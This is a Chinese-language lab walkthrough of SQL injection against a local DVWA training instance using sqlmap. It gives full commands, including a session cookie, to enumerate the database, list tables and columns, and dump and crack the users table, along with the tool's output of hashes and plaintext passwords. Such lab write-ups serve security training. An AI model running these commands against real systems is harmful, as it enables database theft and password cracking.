安装好sqlmap,将路径添加到环境变量
首先找到注入点:http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit
然后进入cmd,
输入:
sqlmap.py -u"http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" -b --current-db --current-user
这是获取当前数据库名和当前用户的命令,如果无法获取,加入下列参数:
--cookie=“security=low; PHPSESSID=mg7hrjknbh6fi2jqlotuf3v9a5”
命令全部为:
sqlmap.py -u"http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie=“security=low; PHPSESSID=mg7hrjknbh6fi2jqlotuf3v9a5” -b --current-db --current-user
cookie需要自己通过浏览器获取,这里讲下win10自带的EDGE浏览器COOKIE获取方法:
在注入页面单击右键》检查元素》网络》选择对应的名称路径,在右侧表头的请求表头可找到COOKIe。
获取到数据:
[16:38:02] [INFO] the back-end DBMS is MySQL
[16:38:02] [INFO] fetching banner
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.4.16
back-end DBMS: MySQL 5.0
banner: '5.6.12-log'
[16:38:02] [INFO] fetching current user
current user: 'root@localhost'
[16:38:02] [INFO] fetching current database
current database: 'dvwa'
[16:38:02] [INFO] fetched data logged to text files under 'C:\Users\denyy\.sqlmap\output\192.168.137.192'
[*] shutting down at 16:38:02
然后获dvwa数据库的表名
输入如下:
SQLMAP.PY -u"http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=mg7hrjknbh6fi2jqlotuf3v9a5" -D dvwa --table
结果如下:
[16:48:00] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.4.16
back-end DBMS: MySQL 5.0
[16:48:00] [INFO] fetching tables for database: 'dvwa'
[16:48:00] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
再获取users表的列名
输入命令:
SQLMAP.PY -u"http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=mg7hrjknbh6fi2jqlotuf3v9a5" -D dvwa -T users --columns
结果如下:
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| user | varchar(15) |
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user_id | int(6) |
+------------+-------------+
然后获取关键列的数值,其中还涉及到破解密码
输入如下命令:
SQLMAP.PY -u"http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=mg7hrjknbh6fi2jqlotuf3v9a5" -D dvwa -T users -C "user_id,user,password" --dump --batch
--dump是将加密的密码破解并输入到默认路径,
--batch默认选中推荐选项,如果不加,上面的明天会弹出几个让你选择Y/n的选项,大写为推荐
得到结果:
Database: dvwa
Table: users
[5 entries]
+---------+---------+---------------------------------------------+
| user_id | user | password |
+---------+---------+---------------------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| 2 | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) |
| 3 | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| 4 | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 5 | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------+---------------------------------------------+
[16:56:55] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\XXXX\.sqlmap\output\192.168.137.192\dump\dvwa\users.csv'
[16:56:55] [INFO] fetched data logged to text files under 'C:\Users\XXXX\.sqlmap\output\192.168.137.192'
其中'C:\Users\XXXX\.sqlmap\output\192.168.137.192\dump\dvwa\users.csv'这个就是破解出来的密码路径